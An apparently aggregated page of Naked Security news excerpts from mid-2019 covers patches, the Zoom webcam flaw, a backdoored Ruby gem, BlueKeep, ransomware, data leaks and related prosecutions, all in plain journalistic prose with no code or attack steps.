Security


Networking


Software


Repairs & Upgrades

July 10, 2019 »

Two zero days and 15 critical flaws fixed in July’s Patch Tuesday

By John E Dunn

Patch Tuesday this month offers fixes for a total of 77 vulnerabilities, of which 15 are marked critical, rounded out by two zero-day flaws just to make things interesting.

However, with an operating system estate as large as Microsoft’s these days, numbers don’t tell the whole story.

A good example of this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including two overlaps, are patched for seven and six flaws respectively, all rated critical, and all remote code execution (RCE) flaws in the most vulnerable part of a browser, the web scripting engine.

It’s worth drawing attention to this because it’s easy to overlook the security of software bundled in Windows 10 which some users either use infrequently, or do not use at all.

As explained in previous coverage, this is particularly the case with IE 11, which many Windows 10 users don’t even realise is there but hangs around to maintain backwards compatibility. Compare that to Windows 10 64-bit version 1903, which earns only one critical, CVE-2019-1102.

Zero days

The two zero days are CVE-2019-0880 and CVE-2019-1132, both Elevation of Privilege (EoP) flaws currently being exploited in the wild by unnamed threat groups. The first affects the Windows splwow64 print spooler while the second is in Win32k.

Read more at https://nakedsecurity.sophos.com/2019/07/10/two-zero-days-and-15-critical-flaws-fixed-in-julys-patch-tuesday/

Rogue Android apps ignore your permissions

By Danny Bradbury

You know those Android dialogue boxes that pop up when you first run an app, asking you what permissions you want to give the software? They’re not as useful as we all thought.

New research has revealed that apps are snooping on data including location and the phone’s unique ID number – even when users haven’t given permission.

The research comes from researchers at the University of Calgary, U.C Berkeley. the IMDEA Networks Institute, the International Computer Science Institute (ICSI) and AppCensus, which offers a searchable database detailing the privacy issues with individual apps. Called 50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System, the paper spotted dozens of apps circumventing permissions-based protections in Android to get the data they want.

Android apps must ask for permission to access sensitive resources on the phone, like the GPS, the camera, or the user’s contacts data. When you say that an app can’t access your location data, the operating system can prevent it from doing so because it runs the app in its own sandbox. That also stops the app in question interacting with other apps.

Sidestepping permissions

The researchers analysed over 88,000 Android apps to see what data they transmitted from the phone, and where they sent it. They ran the test on a variety of Android systems, with the most recent being Android Pie (2018). They matched this against the permissions that the user had granted the app to see if apps were harvesting data that they shouldn’t be. They found dozens of apps transmitting data they shouldn’t have accessed, along with thousands more containing the code to do so. They reverse engineered the code and found two main methods for circumventing permissions protections.

Read more at https://nakedsecurity.sophos.com/2019/07/10/android-apps-sidestepping-permissions-to-access-sensitive-data/

Instagram asks bullies, ‘Are you sure you want to say that?’

By Lisa Vaas

Instagram on Monday announced that it’s now using artificial intelligence (AI) to detect speech that looks like bullying and that it will interrupt users before they post, asking if they might want to stop and think about it first.

The Facebook-owned platform, hugely popular with teens, also plans to soon test a new feature called “Restrict” that will enable users to hide comments from specific users without letting them know that they’ve been muted.

In the blog post, Instagram chief executive Adam Mosseri said the company “could do more” to stop bullying and help out its victims:

We can do more to prevent bullying from happening on Instagram, and we can do more to empower the targets of bullying to stand up for themselves.

These tools are grounded in a deep understanding of how people bully each other and how they respond to bullying on Instagram, but they’re only two steps on a longer path.

Think before you post

Instagram posted one example of what would-be bullies are going to see if its AI interprets their comments as offensive: a user who types “you are so ugly and stupid” gets interrupted with a notice saying: “Are you sure you want to post this? Learn more”.

If the user taps “learn more”, they get this notice: “We are asking people to rethink comments that seem similar to others that have been reported.”

Read more at https://nakedsecurity.sophos.com/2019/07/10/instagram-asks-bullies-are-you-sure-you-want-to-say-that/

Zoom flaw could force you into a meeting, expose your video feed

By Lisa Vaas

Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.

The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.

He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.

In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.

But the researcher said that wouldn’t have solved the problem, given that an attacker would be able to set up a server to make requests to the Zoom site in order to acquire a valid digital signature before contacting the client.

Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]

Read more at https://nakedsecurity.sophos.com/2019/07/09/zoom-flaw-could-force-mac-users-into-meetings-expose-video-feed/

Backdoor discovered in Ruby strong_password library

By John E Dunn

An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.

A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.

The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities.

When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.

The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:

Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.

The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any websites unfortunate to have updated to the rogue strong_password gem.

Read more at https://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/

July 9, 2019 »

Google suspends Trends emails after revealing murder suspect’s name

By Lisa Vaas

After violating a court suppression order and publishing a murder suspect’s name, Google has suspended its Trends alert emails in New Zealand.

In New Zealand, among other countries, the right to a fair trial includes a court’s being able to order people and organizations to refrain from publishing suspects’ names.

Google didn’t do that. It says it didn’t even mean to, but its Google Trends alerts went ahead and emailed out links to a media report that included the murder suspect’s name.

A few days after the December 2018 murder of British backpacker Grace Millane, Google had sent an email to anyone signed up for its “what’s trending in New Zealand” alert. After Google’s news-gathering algorithm picked up a British newspaper’s report of the suspect’s court appearance, it automatically forwarded the story to all subscribers, including the name of the accused killer in the subject line.

That action violated a suppression order prohibiting publication of the suspect’s name or identification details. Google’s violation sparked outrage in New Zealand, which, with its low serious-crime rate, had been shocked by the murder of the young tourist, believed to have been killed the night before her 22nd birthday.

According to a furious letter published by NZ Minister of Justice Andrew Little last week, when he met with Google representatives six months ago, Google said that the company took the issue seriously and that they’d look into what they could do to fix the problem.

Read more at https://nakedsecurity.sophos.com/2019/07/09/google-suspends-trends-emails-after-revealing-murder-suspects-name/

Firefox to include tracker blocking report feature

By Danny Bradbury

Mozilla has introduced a lot of tracker blocking protections into Firefox lately. Now, it is planning a new feature that will let you see how many online snoopers you’ve successfully evaded.

A new feature called the Tracking Protections Panel (aka the Protection Report) will tell users how many trackers Firefox blocked in the prior week, giving them a good sense of how well these protections are working.

To help understand why Mozilla is doing this, it’s worth looking at the tracker protections Firefox has recently added.

Mozilla released the full version of its Enhanced Tracking Protection (ETP) system in Firefox 67.0.1 in June. This introduced default blocking for cross-site trackers, which are the small pieces of code embedded in websites by advertising networks. They watch what you’re reading across the web to generate a profile of you.

Mozilla simultaneously released an updated version of its Facebook Container to stop the social media giant tracking people in a similar way. Those share and like buttons you see on various sites? They tell Facebook what you’re reading across the web – whether you click them or not. The updated container blocks those, along with all other connections to Facebook’s servers.

In May 2019, Firefox also introduced a feature to block any cryptomining scripts that the user runs across. These are JavaScript programs that use the browser’s host computer to mine for cryptocurrency (typically Monero). One or two are legit and ask the user’s permission. Most aren’t, and don’t.

Read more at https://nakedsecurity.sophos.com/2019/07/09/firefox-to-include-tracker-blocking-report-feature/

Apple aims privacy billboard at Google’s controversial smart-city

By Lisa Vaas

Some say that Apple’s strenuous Privacy-R-Us marketing campaign is hypocritical, but that’s not stopping it from continuing to troll Google over the issue.

In January 2019, it was the billboard it erected over Las Vegas during CES, blaring out that “what happens on your iPhone stays on your iPhone.”

The billboard depicted an iPhone and linked to apple.com/privacy: the spot where Apple proclaims that privacy is a “fundamental human right”.

It doesn’t gather and share your data, Apple promises, be it from taking a photo; asking Siri a question; getting directions; what your heart rate is after a run; what news stories you read; where you bought your last coffee; what websites you visit; or who you call, email, or message.

You can do it knowing that Apple doesn’t gather your personal information to sell to advertisers or other organizations.

Apple products are designed to protect your privacy – every Apple product is designed from the ground up to protect that information. And to empower you to choose what you share and with whom.

Quayside: prime site for privacy virtue signaling

But that billboard was then, and this is now: Apple has a new billboard and a far more specific target. This time, the company has erected a privacy billboard at the site of a developing “smart city” called Quayside. Some are calling the neighborhood, on Toronto’s eastern waterfront, a privacy dystopia in the making. It’s going to be sensor-thick, and it’s tangled up with the uber data-collecting Google: the developer is Sidewalk Labs, which is a subsidiary of Google’s parent company, Alphabet.

Read more at https://nakedsecurity.sophos.com/2019/07/09/apple-aims-privacy-billboard-at-googles-controversial-smart-city/

July 8, 2019 »

Researchers hack VR worlds

By Danny Bradbury

Hackers just infiltrated virtual reality (VR), enabling them to manipulate users’ immersive 3D worlds.

At the Recon cybersecurity show in Montreal, researchers Alex Radocea and Philip Pettersson demonstrated how to hack virtual reality worlds on three platforms.

  • The first was VR Chat, a virtual chat room available via online gaming platform Steam and Facebook-owned Oculus.
  • The second was Steam’s own Steam VR platform, which provides games designed for VR and also allows users to play traditional games on a giant virtual screen.
  • Finally, High Fidelity, an open source VR system with its own blockchain-based digital currency, got the hacking treatment.

Hacking an immersive VR world enables an attacker to take complete control of the victim’s virtual world, Radocea and Pettersson warned. An attacker can listen to what the victim is saying, and can also create fake images.

What kinds of real-world attacks could someone engineer in a VR world? In the hacking demonstration, the researchers opened the Calc.exe Windows program, which is a common way to demonstrate that you can run arbitrary code on a system. In most demonstrations, this would just appear on the desktop, but in this case, it replaced one of the VR users’ hands like a giant sticky note that they couldn’t get rid of.

Read more at https://nakedsecurity.sophos.com/2019/07/08/researchers-hack-vr-worlds/

Privacy and security risks as Sign In with Apple tweaks Open ID protocol

By Lisa Vaas

To many, it sounded like a good idea when Apple announced its Sign In with Apple service at WWDC 2019 last month: a privacy-focused login feature that will let macOS Catalina and iOS 13 users sign into third-party apps and websites using their Apple IDs.

It’s a service that’s designed to rival those of the data-gobbling behemoths, Google, Twitter and Facebook, each of which have their own no-no-how-about-you-sign-in-with-ME authentication services. All of these services allow you to use your ID for a quick, one-click sign up or sign on, no password required, as long as you’re signed into whatever tech bigwig’s service that you’re using.

But on 27 June 2019, Apple’s implementation of a sign-in service that doesn’t send personal information to app and website developers was critiqued by the OpenID Foundation (OIDF), the standard-setting organization behind the OpenID open standard and decentralized authentication protocol. The non-profit organization includes tech heavyweights such as Google, Microsoft, PayPal, and others.

The OIDF published an open letter to Apple software chief Craig Federighi, lauding the company for having “largely adopted” OpenID Connect into Sign In with Apple. OpenID Connect is a standardized protocol used by many existing sign-in platforms that lets developers authenticate users across websites and apps without them having to use separate passwords.

Read more at https://nakedsecurity.sophos.com/2019/07/08/privacy-and-security-risks-as-sign-in-with-apple-tweaks-open-id-protocol/

ISPs call Mozilla ‘Internet Villain’ for promoting DNS privacy

By John E Dunn

The UK Internet Service Providers Association (ISPA) has provocatively shortlisted Mozilla for the sort of award that, on the face of it at least, no tech company should be keen to win – ‘2019’s Internet Villain’.

Mozilla’s claim to infamy? From ISPA’s point of view, it’s Firefox’s imminent inclusion of DNS over HTTPS (DoH) – a technology many experts endorse as the biggest jump for internet privacy since the expansion of HTTPS itself.

The problem, according to the ISPA press release, is that the arrival of this technology in the Firefox browser used by millions will make it possible to:

Bypass UK filtering obligations and parental controls, undermining internet safety standards in the UK.

The point of DoH (and the related DNS over TLS, or DoT) is to encrypt DNS requests, which makes it impossible, or at least very difficult, for entities such as ISPs or governments to monitor which websites people are visiting. And because the DNS requests are sent inside encrypted HTTPS requests, they’re also indistinguishable from other web traffic, so they can’t be blocked without blocking all web traffic.

To privacy enthusiasts, this is good because neither ISPs nor governments have any business knowing which domains users happen to frequent.

For ISPs, by contrast, DoH hands them several headaches, including how to fulfil their legal obligation in the UK to store a year’s worth of each subscriber’s internet visits in case the government wants to study them later for evidence of criminal activity.

Read more at https://nakedsecurity.sophos.com/2019/07/08/isps-call-mozilla-internet-villain-for-promoting-dns-privacy/

New Year’s eve gaming DDoSer lulz himself into a 27-month sentence

By Lisa Vaas

Back in 2014, an entity calling itself @DerpTrolling was one of a bunch of squabbling steamrollers that just about pancaked the gaming world with multiple distributed denial-of-service (DDoS) attacks before, during and after New Year’s Eve.

At the time, @DerpTrolling called itself a group of hackers and, in a chat with the YouTube gaming channel #DramaAlert, said that he/she/they simply attacked sites based on requests from people who tweeted suggested targets.

In other words, it was all just a game, and it was all for the lulz.

In November 2018, one of the “gang” of hackers – possibly the only one – behind the @DerpTrolling moniker got busted. Austin Thompson, a 23-year-old from the US state of Utah, pleaded guilty on 6 November 2018 in a San Diego Federal court to knowingly causing damage to third-party computers.

There’s no lulzing now: on Tuesday, Thompson was sentenced in federal court to 27 months in prison for carrying out a series of DDoSes against multiple victims between 2013 and 2014.

Read more at https://nakedsecurity.sophos.com/2019/07/08/new-years-eve-gaming-ddoser-lulz-himself-into-a-27-month-sentence/

5 tips to stay secure on social media

By Paul Ducklin

Here at Naked Security, we’re well aware that social networks aren’t for everyone, and if you’ve decided to stay away from them, we’re good with that.

After all, the best way to prevent privacy blunders and data breaches is simply not to give out the data in the first place – or, if you’re a vendor, not to pressurise people into sharing things that they don’t need to give you and that you’ll probably never use anyway.

But we’re not killjoys, either.

We enjoy spending time on social media – it’s a fun and effective way to keep in contact with our followers and to spread the word about cybersecurity without relying entirely on written articles.

We think you can be part of the social media scene and yet keep enough of your life and lifestyle private that you end up enjoying the benefits without being squashed by the risks…

…but you do need to follow some simple guidelines, both to protect yourself from online rogues, and to stop those same online rogues abusing your account to attack your friends.

Anyway, last weekend was #SocialMediaDay, which was meant to be a way to celebrate all the cool things that social networks let you do, but NOT a call to throw all caution to the winds and start sharing everything with everyone!

Read more at https://nakedsecurity.sophos.com/2019/07/05/5-tips-to-stay-secure-on-social-media/

OpenPGP experts targeted by long-feared ‘poisoning’ attack

By John E Dunn

Somebody out there has taken a big dislike to Robert J. Hansen (‘rjh’) and Daniel Kahn Gillmor (‘dkg’), two well-regarded experts in the specialized world of OpenPGP email encryption.

It’s not known who launched the attacks in late June 2019 (Hansen says he has suspects in mind), but it’s the nature of the campaign against them that has people in this corner of encryption worried – a “poisoning” attack against their personal certificate signatures held on the OpenPGP Synchronizing Key Server (SKS) network.

It sounds arcane but the effects of this on the sizeable number of people using implementations of the OpenPGP protocol – GnuPGP, SequoiaPGP, OpenPGP.js – are to varying degrees potentially very serious. Daniel Kahn Gillmor blogged last week:

My public cryptographic identity has been spammed to the point where it is unusable in standard workflows.

The most disconcerting thing about these attacks is how easy they were to launch simply by spamming large numbers of fake certificate signatures to the keyservers, effectively burying the real one belonging to the two men under thousands of bogus additions.

This sort of attack has been feared for a decade, with smaller attacks recorded a year ago fulfilling that prediction. What’s novel this time, however, is the scale and highly targeted nature of the campaign. As Hansen sums it up in his own reaction:

To have my own certificate directly spammed in this way felt surprisingly personal, as though someone was trying to attack or punish me, specifically.

And it really is a flood – comprising 55,000 fakes directed at Daniel Kahn Gillmor and twice that number at Hansen. This causes problems (see below) but what matters is that the pair now fear the attack will be used against others, expanding its scope in ways that will be very hard to counter.

Read more at https://nakedsecurity.sophos.com/2019/07/05/openpgp-experts-targeted-by-long-feared-poisoning-attack/

July 3, 2019 »

IoT vendor Orvibo gives away treasure trove of user and device data

By Danny Bradbury

Two billion items of log data from devices sold by China-based smart IoT device manufacturer Orvibo was found by researchers at web privacy review service vpnMentor, who discovered the data in an exposed ElasticSearch server online.

Orvibo has been selling products for smart homes, businesses, and hotels since 2011, ranging from HVAC systems through to home security, energy management, and entertainment systems. The back-end database appears to have been logging system events from lots of them.

Researchers Noam Rotem and Ran Locar found logs from Orvibo devices in China, Japan, Thailand, the US, the UK, Mexico, France, Australia, and Brazil, vpnMentor said in its report.

This data provides insights into the lives of Orvibo’s customers, creating potential security risks, it warned.

With over 2 billion records to search through, there was enough information to put together several threads and create a full picture of a user’s identity.

The logs discovered by the vpnMentor team contained various pieces of personal information, including email addresses, usernames, user IDs, and passwords. Orvibo’s developers had used the notoriously insecure MD5 hashing mechanism to protect the passwords. It had also failed to use a salt, which is a random string combined with the password that makes hashed passwords far more difficult to recover.

The log data also included codes required for users to reset their accounts. The company said:

With this code accessible in the data, you could easily lock a user out of their account, since you don’t need access to their email to reset the password.

The code enables people to reset their email addresses too, meaning that an attacker could deny a user any chance of regaining their passwords.

Read more at https://nakedsecurity.sophos.com/2019/07/03/iot-vendor-orvibo-gives-away-treasure-trove-of-user-and-device-data/

Georgia’s court system hit by ransomware

By Lisa Vaas

Georgia’s court system has been hit with may be the fourth Ryuk ransomware strike against state and local agencies in the past month and a half.

At the time of publishing this article, the site was still down.

According to Atlanta’s Channel 11 News, officials confirmed on Monday that at least part of the court system’s network had been knocked offline by a ransomware attack.

Details about the extent of the damage haven’t been publicly disclosed, but officials say it’s much less severe than the attack against Atlanta that destroyed years of police dashcam video last year, as well as freezing systems. Six days after it was hit, Atlanta was still rescheduling court dates, police and other employees were still writing out reports by hand, and residents couldn’t go online to pay their water bills or parking tickets.

The earlier attack against Atlanta involved SamSam ransomware – a high-profile ransomware that was typically used in targeted attacks where attacker’s break into a victim’s network and launch ransomware manually, to cause maximum damage and disruption.

The crooks demanded what was then roughly $52,000 worth of bitcoin. That paled in comparison to the $2.6 million worth of emergency contracts the city initiated to claw back its systems, and to the six figure ransoms demanded in similar targeted attacks by other gangs.

The nature of this latest attack on Georgia’s court system hasn’t yet been determined. Authorities said the extortionists’ note didn’t specify a specific ransom amount or demands. Although the attack doesn’t appear to be as crippling as the SamSam one from last year, they took the court network offline to stay on the safe side, authorities said.

While little details were available as of Tuesday afternoon, there’s a hint that the Georgia assault might involve Ryuk ransomware.

Read more at https://nakedsecurity.sophos.com/2019/07/03/georgias-court-system-hit-by-ransomware/

Miami police body cam videos up for sale on the darkweb

By Lisa Vaas

This can’t be a good day for Miami police.

We’ve known for a while that many webcams are a security train wreck, and that doesn’t change just because a police officer straps one on.

Now, unsurprisingly, police body cam footage has been found sloshing around online.

It’s not just that about a terabyte of videos from Miami Police Department body cams was leaked and stored in unprotected, internet-facing databases, according to the security outfit that found them. It’s that they were leaked and then sold, according to Jason Tate, CEO of Black Alchemy Solutions Group, who told The Register that his team had found the footage listed for sale on the darkweb.

Tate first tweeted about the discovery on Saturday, including a sample video, which has since been removed.

Tate said that the data is coming from five different cloud service providers. Besides Miami Police, there’s video leaking from city police departments “all over the US”, he said.

It seems these 5 providers have city contracts all over.

Read more at https://nakedsecurity.sophos.com/2019/07/03/miami-police-body-cam-videos-up-for-sale-on-the-darkweb/

Patch Android! July 2019 update fixes 9 critical flaws

By John E Dunn

Depending on when users receive it, this week’s Android July 2019 patch update will fix 33 security vulnerabilities, including 9 marked critical, and 24 marked high.

If you own a Google Pixel device, that will be within a day or two, leaving everybody else on the 2019-07-01 and 2019-07-05 patch levels (what these dates mean is explained here) running Android 7, 8 or 9 to wait anything from weeks to months to catch up.

As usual, July’s batch of fixes covers flaws in significant parts of Android, including system, framework, library, and Qualcomm’s numerous components, including closed-source software.

However, as has been the case for some months, it’s the media framework that provides a disproportionate amount of the patching action in the form of three remote code execution (RCE) bugs marked critical.

These are CVE-2019-2107, CVE-2019-2106 (affecting Android 7 and 8), and CVE-2019-2109 (which only affects Android 9).

Another RCE critical is CVE-2019-2111 in the Android system, with the remaining critical flaws all connected to Qualcomm’s closed-source components.

Read more at https://nakedsecurity.sophos.com/2019/07/03/patch-android-july-2019-update-fixes-9-critical-flaws/

July 2, 2019 »

Scary Granny zombie game slurps credentials, spawns phishing attack

By Danny Bradbury

Halloween came a little early for some Android users this year after a horror-themed computer game was found stealing their account credentials and displaying potentially malicious ads.

Researchers at mobile security company Wandera found the game, called Scary Granny ZOMBYE Mod: The Horror Game 2019, doing sneaky things behind the scenes. Upon installation, it tries to get the user to pay £18 (about $22) for the game, and then connects to an ad network that appears to spam the user’s device with commercials for other malicious games. Finally, it tries to phish the user’s Google account.

The game, apparently based on another highly successful Android game called Granny, releases a phishing attack against the target device, displaying a notification that asks the user to update their Google Security services. When the unwitting user agrees, it presents a fake login page to slurp their credentials.

For those that took the bait, the phishing code uses a browser built into the app to access the user’s account and downloads their recovery emails and phone numbers, their verification, their cookies and tokens (which could give the attackers access to third-party apps) and their verification codes. Wandera explained:

We could see the user information including cookies and session identifier being gathered and shipped off to the attacker without the user knowing. This is a proof point that this attack goes beyond typical credential theft that usually happens via social engineering.

The researchers also discovered code that seemed to attempt the same phishing technique with Facebook credentials, although they didn’t see that part of the program in action.

Read more at https://nakedsecurity.sophos.com/2019/07/02/scary-granny-android-game-slurps-users-data/

Dating app Jack’d fined $240K for leaving private photos up for a year

By Lisa Vaas

A $240,000 fine has been imposed on Online Buddies, the company behind gay/bi/trans/curious dating app Jack’d – for leaving users’ private, often nude, photos up for grabs for a year.

“Only you can see your private pictures until you unlock them for someone else,” Jack’d promised, even after a researcher found that that was far from true. In fact, anyone with a web browser who knew where to look could access any Jack’d user’s photos, be they private or public – all without authentication or even the need to sign in to the app.

The Office of New York Attorney General Letitia James on Friday announced the settlement, handed down for:

Failure to protect private photos of users of its ‘Jack’d’ dating application … and the nude images of approximately 1,900 users in the gay, bisexual, and transgender community.

From the announcement:

Although the company represented to users that it had security measures in place to safeguard users’ information, and that certain photos would be marked ‘private,’ the company failed to implement reasonable protections to keep those photos private, and continued to leave security vulnerabilities unfixed for a year after being alerted to the problem.

The Attorney General office’s release said that Jack’d – a dating app that claims to have hundreds of thousands of active users worldwide and which markets itself as a tool to help men in the LGBTQIA+ community to hook up and date – “explicitly and implicitly” assures users that its private pictures feature can be used to exchange nude images securely and privately.

Read more at https://nakedsecurity.sophos.com/2019/07/02/dating-app-jackd-fined-240k-for-leaving-private-photos-up-for-a-year/

Medtronic rushes to replace insulin pumps after flaws found

By John E Dunn

Note. Naked Security cannot provide medical advice nor answer questions about specific Medtronic devices. If you’re concerned please contact your health professional or Medtronic directly on (US) 855-275-2717.

US medical equipment giant Medtronic has announced the immediate recall of all MiniMed 508 and Paradigm series insulin pumps after researchers uncovered serious security flaws which can’t be patched.

The news emerged last week when the company started sending recall letters to all US users of the device, a warning echoed by a public alert issued by the US Food and Drug Administration (FDA).

According to the FDA, Medtronic has identified around 4,000 US patients using affected models although an unknown number of others (including patients in other countries) will have received them through third parties.

This is still a relatively small number, which is perhaps explained by the fact that both pumps are older models dating back to 2012 that were withdrawn from sale in October 2018.

The pumps

The job of a pump is to deliver insulin to a patient throughout the day via a catheter implanted under the skin, which removes the need for regular injections to maintain stable blood glucose levels.

However, to do this, the pumps need to connect to a separate continuous glucose monitor (CGM) sensor which for a decade or so has been implemented wirelessly using Bluetooth.

Read more at https://nakedsecurity.sophos.com/2019/07/02/medtronic-rushes-to-replace-insulin-pumps-after-flaws-found/

Relatives’ DNA in genealogy database leads to murder conviction

By Lisa Vaas

At the time that the brutalized bodies of a Canadian couple were discovered near Washington’s Mount Rainier nearly 32 years ago, police believed that the killer left his plastic gloves in plain view near their van so as to taunt investigators.

Detective Robert Gebo of the Seattle Police Department:

He leaves those behind as a sign to the police that you needn’t look for fingerprints because I wore these gloves. And he has confidence that there’s nothing that’s going to connect him with these crimes.

That killer’s self-confidence was misplaced. Decades later, he was tracked down through links to the DNA of two cousins. On Friday morning, a Snohomish County jury found William Earl Talbott II guilty on two counts of aggravated murder in the first degree for the deaths of 21-year-old Jay Cook and his 17-year-old girlfriend, Tanya Van Cuylenborg.

First DNA database conviction

This is believed to be the first murder conviction of a suspect who was identified through genealogy databases. CeCe Moore, a genetic genealogist who works for forensic company Parabon NanoLab, had used a public DNA site, GEDmatch, to help build this family tree for what would turn out to be the now-convicted murderer, based on DNA evidence from the crime scene. That tree shows the links between Talbott and two of his cousins who had uploaded their genetic profiles to GEDmatch.

Read more at https://nakedsecurity.sophos.com/2019/07/02/relatives-dna-in-geneology-database-leads-to-murder-conviction/

RDP BlueKeep exploit shows why you really, really need to patch

By Mark Stockley

About six weeks ago Microsoft took the highly unusual step of including a patch for operating systems it no longer supports in its May Patch Tuesday output.

It’s something the software juggernaut has only ever felt the need to do on a handful of occasions, so when it does happen it can be taken as a sign that something very serious indeed is going on. In this case, the something serious was CVE-2019-0708, a very serious RDP vulnerability, that would soon become better known as BlueKeep.

RDP (the Remote Desktop Protocol) is what allows people to control Windows machines via a full graphical user interface, over the internet. The millions of internet-connected machines running RDP includes everything from cloud-hosted servers to Windows desktops used by remote workers, and each one is a potential gateway into an organisation’s internal network.

The ‘wormable’ BlueKeep vulnerability, announced by Microsoft with the release of patches to protect against it, could theoretically be used to run attackers’ code on every one of those machines, without a username and password.

The only sliver of hope that came with May’s patches was that CVE-2019-0708 was difficult to exploit. That difficulty created a window of time for organisation’s to patch against BlueKeep before crooks figured out how to abuse it. There was even the outside chance that it would prove too difficult to reverse engineer.

It was a hope that didn’t last long.

Since CVE-2019-0708 became public, a small number of organisation’s and security researchers have credibly claimed the ability to successfully exploit it.

Read more at https://nakedsecurity.sophos.com/2019/07/01/rdp-bluekeep-exploit-shows-why-you-really-really-need-to-patch/

ETERNALBLUE sextortion scam puts your password where your name should be

By Paul Ducklin

Remember sextortion?

That’s the name for the cybercrime where crooks blast you with spam claiming to know something about your sex life or sexuality that you’d probably want to keep private if it were true…

…and then threaten to tell the world (or at least your colleagues, friends and family) all about it.

Unless you send them money right away, usually in the form of a cryptocurrency like Bitcoin, and usually within 48 hours.

It’s all a pack of lies, of course – the crooks blast out millions of these messages in the hope that the contents will be close enough to the truth that at least some victims will pay up.

Generally, the crooks say they have taken screenshots of you viewing porn, synchronized with a recording they made at the same time via your webcam.

But even if you never watch porn, or don’t have a webcam, or both, this sort of email can still be alarming because the crooks also claim to have total control of your computer, typically including:

  • Access to your passwords.
  • Access to you what you type in even if you go and change your passwords.
  • Access to your email and social media contact lists.

Also, to increase your fear, the crooks may offer “proof” that they’ve already stolen private data from you by including one or more snippets of personal information in the email.

The crooks often include your phone number or one of your passwords recovered from an existing data breach, or they pretend that they sent the email directly from your own account.

Read more at https://nakedsecurity.sophos.com/2019/07/01/eternalblue-sextortion-scam/

Cloud computing giant PCM hacked

By Danny Bradbury

A hacking group has gained access to the internal infrastructure of large cloud services provider PCM.

California-based PCM provides a mixture of solutions including cloud services and hardware, and made over $2bn in revenues in 2018. According to a report by specialist cybersecurity journalist Brian Krebs, the company discovered the breach in mid-May. Sources told him that the attackers stole administrative credentials for Office 365 accounts, and that they were mostly interested in using stolen data to conduct gift card fraud.

The modus operandi in this case was similar to other attacks on large IT providers we’ve seen, in which the hacking group sends phishing emails to companies including retailers, employee reward programs, customer loyalty and recognition businesses, and other organizations dealing in gift cards.

After compromising a system, the group would use a custom version of a malware strain called Mimikatz, which collects usernames and passwords from memory.

Once the group has access to the infrastructure of companies that deal in gift cards, it would then use money transfer services, payment processing services, and clearing houses to monetize that information. The report added:

A possible theory for targeting could be that gift cards provide access to liquid assets outside of the traditional western financial system.

Read more at https://nakedsecurity.sophos.com/2019/07/01/cloud-computing-giant-pcm-hacked/

June 27, 2019 »

Hacker threw Molotov cocktail, dropped USB drive of his DDoS deeds

By Lisa Vaas

If you’re going to go around DDoSing businesses, it’s probably not the slickest idea to carry a thumb drive full of evidence in your pocket while you’re hurling a Molotov cocktail at one of their brick-and-mortars.

A now-35-year-old Belgian man who was already sentenced to prison for hurling that bomb has had his sentence extended by 18 months because of what investigators found on a USB drive that the man dropped during or after his 2014 attack on a Crelan Bank in the town of Rumbeke, Belgium, according to Belgian news site Het Laatste Nieuws (HLN).

HLN reported last week that the USB held evidence showing that the man, identified in court documents only as Brecht S., was a member of the hacker groups that brand themselves as Anonymous Belgium and Cyber Crew.

It also implicated the man in launching a distributed denial of service attack (DDoS) against Crelan Bank that took it offline for hours, and that he extorted a pizza shop, DDoS-ing it several times until the pizzeria paid him to call off the attacks.

Investigators who searched Brecht’s devices and history reportedly found evidence that Brecht had participated in large-scale international cyber-attacks, including attacks launched against the Fédération Internationale de Football Association (FIFA): the world soccer’s governing body.

FIFA has been hacked multiple times: The first time, in 2017, led to the publishing of footballers’ failed drug tests. At the time, the attack was attributed to the Russian hacking group Fancy Bear, also known as APT28.

Read more at https://nakedsecurity.sophos.com/2019/06/26/hacker-threw-molotov-cocktail-dropped-usb-drive-of-his-ddos-deeds/

Social engineering forum hacked; user data dumped on rival site

By Lisa Vaas

Social Engineered, a forum that bills itself as dedicated to the “Art of Human Hacking,” may have been given a dose of its own medicine: in mid-June, its user data was leaked and dumped on a rival forum.

On Thursday, the founder of Social Engineered, who goes by the username Snow101, confirmed the breach, blaming a MyBB vulnerability:

Mybb had a vulnerability yet again and the site got breached along other websites using Mybb. We moved over to xenforo i suggest changing your passwords immediately [sic].

MyBB is open-source, free software used to create and run online forums.

Snow101 said that Social Engineered has now moved over to the XenForo platform to try to avoid a repeat of the data breach. The forum owner is also looking for contributions: Snow101 asked members to voluntarily chip in to help in the shift from a free, open-source project to a commercial forum.

According to Bleeping Computer, whoever’s behind the leak posted that they had “uploaded the full database and root directory of this website.”

MyBB’s MyBad month

MyBB has had a shaky month. It was one of the many CMSs (content management systems) that researchers recently found weren’t storing passwords securely. They found that MyBB, along with a dozen others, was using the now obsolete MD5 hashing function.

Weak password hashing couldn’t have caused the breach at Social Engineered, but it might make the consequences of the breach much worse as hackers make light work of cracking the site’s exposed password database.

Read more at https://nakedsecurity.sophos.com/2019/06/26/social-engineering-forum-hacked-user-data-dumped-on-rival-site/

